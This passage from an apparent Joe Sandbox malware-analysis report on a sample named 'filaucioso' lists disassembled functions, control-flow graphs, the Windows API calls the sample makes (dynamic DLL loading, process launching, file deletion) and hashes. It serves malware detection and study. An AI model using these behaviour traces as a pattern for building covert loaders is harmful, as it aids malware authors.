                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                        • API String ID: 2200240437-4240819195
                                                                        • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                        • Instruction ID: 3c3b4468b6e1923fcac8586f88cca04ee8b9faba7420f287fa6fd57e775497b1
                                                                        • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                        • Instruction Fuzzy Hash: B2F0FC70500609ABDB14ABA4DD0DFEB765CAB08304F14057AA987E10C1D678E4358B98

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 713 40206a-402076 714 402131-402133 713->714 715 40207c-402092 call 402b2c * 2 713->715 716 4022a4-4022a9 call 401423 714->716 725 4020a1-4020af LoadLibraryExA 715->725 726 402094-40209f GetModuleHandleA 715->726 722 4029b8-4029c7 716->722 728 4020b1-4020be GetProcAddress 725->728 729 40212a-40212c 725->729 726->725 726->728 730 4020c0-4020c6 728->730 731 4020fd-402102 call 405114 728->731 729->716 732 4020c8-4020d4 call 401423 730->732 733 4020df-4020f6 call 6e3a16db 730->733 736 402107-40210a 731->736 732->736 743 4020d6-4020dd 732->743 738 4020f8-4020fb 733->738 736->722 739 402110-402118 call 4037aa 736->739 738->736 739->722 744 40211e-402125 FreeLibrary 739->744 743->736 744->722
                                                                        APIs
                                                                        • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 00402095
                                                                          • Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                          • Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                          • Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,00000000,00798F00,74DF23A0), ref: 00405170
                                                                          • Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll), ref: 00405182
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 004020A5
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040211F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                        • String ID: /z
                                                                        • API String ID: 2987980305-1190999251
                                                                        • Opcode ID: 552394a17ba07369f051b22535714e48d013b44a7071bd44497ac4ed692714f9
                                                                        • Instruction ID: e61536644f3bf68f7d9d9aba667bc4080f9c9cd2ba15b67bd91c869db9746c0c
                                                                        • Opcode Fuzzy Hash: 552394a17ba07369f051b22535714e48d013b44a7071bd44497ac4ed692714f9
                                                                        • Instruction Fuzzy Hash: 6521C671900214ABCF11BFA4CF89AAE7AB4AF45318F20413BF601B62D1D6FD4982965E

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 746 405bb5-405bbf 747 405bc0-405beb GetTickCount GetTempFileNameA 746->747 748 405bfa-405bfc 747->748 749 405bed-405bef 747->749 751 405bf4-405bf7 748->751 749->747 750 405bf1 749->750 750->751
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405BC9
                                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BE3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: "C:\ProgramData\filaucioso.bat" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                        • API String ID: 1716503409-3215709855
                                                                        • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                        • Instruction ID: d190f65444f006a88ba75eae1d2615f44ee573feb2fe82d01cd284afd59f947a
                                                                        • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                        • Instruction Fuzzy Hash: C1F082363042086BDB109F56DD04B9B7BA9DFA1750F10803BFA489A280D6B4E9558758

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 752 6e3a16db-6e3a1717 call 6e3a1a98 756 6e3a171d-6e3a1721 752->756 757 6e3a1834-6e3a1836 752->757 758 6e3a172a-6e3a1737 call 6e3a22f1 756->758 759 6e3a1723-6e3a1729 call 6e3a22af 756->759 764 6e3a1739-6e3a173e 758->764 765 6e3a1767-6e3a176e 758->765 759->758 768 6e3a1759-6e3a175c 764->768 769 6e3a1740-6e3a1741 764->769 766 6e3a178e-6e3a1792 765->766 767 6e3a1770-6e3a178c call 6e3a24d8 call 6e3a1559 call 6e3a1266 GlobalFree 765->767 770 6e3a17dc-6e3a17e2 call 6e3a24d8 766->770 771 6e3a1794-6e3a17da call 6e3a156b call 6e3a24d8 766->771 792 6e3a17e3-6e3a17e7 767->792 768->765 772 6e3a175e-6e3a175f call 6e3a2cc3 768->772 774 6e3a1749-6e3a174a call 6e3a2a38 769->774 775 6e3a1743-6e3a1744 769->775 770->792 771->792 785 6e3a1764 772->785 788 6e3a174f 774->788 780 6e3a1751-6e3a1757 call 6e3a26b2 775->780 781 6e3a1746-6e3a1747 775->781 791 6e3a1766 780->791 781->765 781->774 785->791 788->785 791->765 795 6e3a17e9-6e3a17f7 call 6e3a249e 792->795 796 6e3a1824-6e3a182b 792->796 802 6e3a17f9-6e3a17fc 795->802 803 6e3a180f-6e3a1816 795->803 796->757 798 6e3a182d-6e3a182e GlobalFree 796->798 798->757 802->803 805 6e3a17fe-6e3a1806 802->805 803->796 804 6e3a1818-6e3a1823 call 6e3a14e2 803->804 804->796 805->803 807 6e3a1808-6e3a1809 FreeLibrary 805->807 807->803
                                                                        APIs
                                                                          • Part of subcall function 6E3A1A98: GlobalFree.KERNEL32(?), ref: 6E3A1D09
                                                                          • Part of subcall function 6E3A1A98: GlobalFree.KERNEL32(?), ref: 6E3A1D0E
                                                                          • Part of subcall function 6E3A1A98: GlobalFree.KERNEL32(?), ref: 6E3A1D13
                                                                        • GlobalFree.KERNEL32(00000000), ref: 6E3A1786
                                                                        • FreeLibrary.KERNEL32(?), ref: 6E3A1809
                                                                        • GlobalFree.KERNEL32(00000000), ref: 6E3A182E
                                                                          • Part of subcall function 6E3A22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6E3A22E0
                                                                          • Part of subcall function 6E3A26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E3A1757,00000000), ref: 6E3A2782
                                                                          • Part of subcall function 6E3A156B: wsprintfA.USER32 ref: 6E3A1599
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2063049847.000000006E3A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E3A0000, based on PE: true
                                                                        • Associated: 00000001.00000002.2063032692.000000006E3A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063063793.000000006E3A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063077518.000000006E3A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6e3a0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                        • String ID:
                                                                        • API String ID: 3962662361-3916222277
                                                                        • Opcode ID: 54bb665c8ddc45ac7bfde4c87c4c153e3a8380b3a5865dc7a945ffbe084674a7
                                                                        • Instruction ID: 2fa1c7d23dbca1be35ac8a5f6b96bf37d586f63fdc1430bd9444efc53d47a1ab
                                                                        • Opcode Fuzzy Hash: 54bb665c8ddc45ac7bfde4c87c4c153e3a8380b3a5865dc7a945ffbe084674a7
                                                                        • Instruction Fuzzy Hash: 304191F10002059ACB40EFED9994BEA77ACFF05314F1498A9EB559A086DF7684C9CBA0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 809 4015bb-4015ce call 402b2c call 405a1e 814 4015d0-4015e3 call 4059b0 809->814 815 401624-401627 809->815 824 4015e5-4015e8 814->824 825 4015fb-4015fc call 405657 814->825 817 401652-4022a9 call 401423 815->817 818 401629-401644 call 401423 call 405fed SetCurrentDirectoryA 815->818 832 4029b8-4029c7 817->832 818->832 835 40164a-40164d 818->835 824->825 826 4015ea-4015f1 call 405674 824->826 833 401601-401603 825->833 826->825 839 4015f3-4015f9 call 4055da 826->839 837 401605-40160a 833->837 838 40161a-401622 833->838 835->832 841 401617 837->841 842 40160c-401615 GetFileAttributesA 837->842 838->814 838->815 839->833 841->838 842->838 842->841
                                                                        APIs
                                                                          • Part of subcall function 00405A1E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
                                                                          • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A31
                                                                          • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A45
                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                          • Part of subcall function 004055DA: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040561D
                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens,00000000,00000000,000000F0), ref: 0040163C
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens, xrefs: 00401631
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens
                                                                        • API String ID: 1892508949-141257294
                                                                        • Opcode ID: f5c3f39b15ad55609bffd819d714ffdf85f21870f50e58168f1843105bbc3170
                                                                        • Instruction ID: afd89d35c011052612b9933dc16c135e328f8afd03e06d15a27ba8224079e4e0
                                                                        • Opcode Fuzzy Hash: f5c3f39b15ad55609bffd819d714ffdf85f21870f50e58168f1843105bbc3170
                                                                        • Instruction Fuzzy Hash: AC112731508141EBDB217FB54D4197F36B49E96324F28453FE4D1B22E2DA3D4842AA2E
                                                                        APIs
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406118,80000002), ref: 00405F1A
                                                                        • RegCloseKey.ADVAPI32(?,?,00406118,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsj1E85.tmp\System.dll), ref: 00405F25
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID: Call
                                                                        • API String ID: 3356406503-1824292864
                                                                        • Opcode ID: 1030a17f86b53444e8a5a3b6bccfdd0324da9206876f6c82357e637410bb066d
                                                                        • Instruction ID: 2e4321f520f0c42760b8dd6c663e9e781067c597ec393d4c632fa8beed11a635
                                                                        • Opcode Fuzzy Hash: 1030a17f86b53444e8a5a3b6bccfdd0324da9206876f6c82357e637410bb066d
                                                                        • Instruction Fuzzy Hash: 3B019A7250020AAADF22CF20CC09FDB3BA8EF55360F00442AF904A2190D278CA54CFA8
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D50,Error launching installer), ref: 004056B5
                                                                        • CloseHandle.KERNEL32(?), ref: 004056C2
                                                                        Strings
                                                                        • Error launching installer, xrefs: 0040569F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: f0a19a88b4191ad482a62bb3ee09ede63fcf5498891b486954be21cba29d19c8
                                                                        • Instruction ID: 2140ebbf1eee4cb4891f52a8ff1fd75339fa61df53f1a1a9c1e04f6e33d43294
                                                                        • Opcode Fuzzy Hash: f0a19a88b4191ad482a62bb3ee09ede63fcf5498891b486954be21cba29d19c8
                                                                        • Instruction Fuzzy Hash: 40E0BFF5610209BFEB009FA4DE05F7B7BBDEB40704F404925BD10F2160D774A8148A78
                                                                        APIs
                                                                          • Part of subcall function 004056CF: ShellExecuteExA.SHELL32(?,00401F29,?), ref: 004056DE
                                                                          • Part of subcall function 004063FA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F43,?,?,?,?,?,?), ref: 0040640B
                                                                          • Part of subcall function 004063FA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040642D
                                                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00401F8D
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens, xrefs: 00401F11
                                                                        • @, xrefs: 00401F31
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                                                        • String ID: @$C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens
                                                                        • API String ID: 165873841-714393960
                                                                        • Opcode ID: 8519022bf249ecbbc196bf988a98103f7eb23198aad2c35d86c9091ea44dd8f3
                                                                        • Instruction ID: 6fb4e818f2c942e9b4bba88a026eebdec746967c1f1042f55a0f18c21242a27d
                                                                        • Opcode Fuzzy Hash: 8519022bf249ecbbc196bf988a98103f7eb23198aad2c35d86c9091ea44dd8f3
                                                                        • Instruction Fuzzy Hash: DA113D71E042049ACB12EFB98A45A8DBFF4AF09318F24057BE555F72D2DBB88801DB18
                                                                        APIs
                                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
                                                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 00402591
                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj1E85.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Enum$CloseValue
                                                                        • String ID:
                                                                        • API String ID: 397863658-0
                                                                        • Opcode ID: 5fdd96a4c8267d24c04b63ca7e37b561cfa3a4140926a300f230920ceefefb6b
                                                                        • Instruction ID: dbd097197b1ddcdec4c3bfd44c4d49ca57d6fe8d8a156bba66eafe5791494d89
                                                                        • Opcode Fuzzy Hash: 5fdd96a4c8267d24c04b63ca7e37b561cfa3a4140926a300f230920ceefefb6b
                                                                        • Instruction Fuzzy Hash: D801BCB1901204FFE711DF699E89ABF7ABCEB81344F10403EF442B62C0D6B84E009629
                                                                        APIs
                                                                          • Part of subcall function 00405B61: GetFileAttributesA.KERNELBASE(?,?,00405779,?,?,00000000,0040595C,?,?,?,?), ref: 00405B66
                                                                          • Part of subcall function 00405B61: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B7A
                                                                        • RemoveDirectoryA.KERNEL32(?,?,?,00000000,0040595C), ref: 00405788
                                                                        • DeleteFileA.KERNELBASE(?,?,?,00000000,0040595C), ref: 00405790
                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 004057A8
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: File$Attributes$DeleteDirectoryRemove
